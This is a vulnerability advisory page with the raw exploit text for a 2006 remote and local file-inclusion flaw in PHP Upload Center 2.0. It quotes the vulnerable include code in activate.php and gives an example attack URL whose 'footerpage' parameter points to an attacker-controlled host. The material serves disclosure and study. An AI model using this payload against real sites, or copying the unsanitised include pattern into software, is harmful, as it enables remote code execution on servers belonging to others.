Coding 4 Fun

vendor:

PHP Upload Center

by:

GregStar

7,5

CVSS

HIGH

Remote/Local File Inclusion

CWE

Product Name: PHP Upload Center

Affected Version From: 2.0

Affected Version To: 2.0

Patch Exists: YES

Related CWE: N/A

CPE: a:php_upload_center:php_upload_center_2.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

The vulnerability exists due to insufficient sanitization of user-supplied input passed via the 'language' and 'footerpage' parameters to the 'activate.php' script. This can be exploited to include arbitrary local and remote files by passing directory traversal strings to the 'language' parameter and a URL to the 'footerpage' parameter.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized.

Source

Exploit-DB raw data:

*************************************************************************************************************************
                                                              					          		 
			               			 Coding 4 Fun     						 
			                                      						  		 
*************************************************************************************************************************
													  		 
* Name = PHP Upload Center v2.0 ; 											 
													  		 
* Class = Remote/Local File Inclusion ;											 
															 
* Download = http://skrypty.webpc.pl/pobierz.php?id=58 ;				 			         
													  		 
* Found by = GregStar (gregstar[at]c4f[dot]pl) (http://c4f.pl) ;				          		 
												  	  		 
-------------------------------------------------------------------------------------------------------------------------
													  		 
Vulnerable Code in activate.php												 
															 
line 66-70														 
															 
...															 
															 
 if (!isset($language))													 
  $language=$dft_language;												 
if ($language=="")													 
  $language=$dft_language;												 
require("include/${language}.php"); <== Local incl.								 
															 
...															 
	

line 164

...

include($footerpage);  <== Remote incl.

...


Code in include/en.php (and other language files)

line 5-7

...

$headerpage="include/header.htm";
$footerpage="include/footer.htm"; <==
$infopage="include/info.htm";

...

												  		 
- Ex. :	

  														 
 http://[target]/[path]/activate.php?language=conf&footerpage=http://evil?								 
															 
															 
															 
															 
*************************************************************************************************************************
Gr33tz:  sASAn,marcel3miasto,masS,kaziq,Abi,kociaq,SlashBeast,chochlik,rfl,d3m0n,java,reyw,kw@ch.	  		 
												          		 
*************************************************************************************************************************

# milw0rm.com [2006-12-03]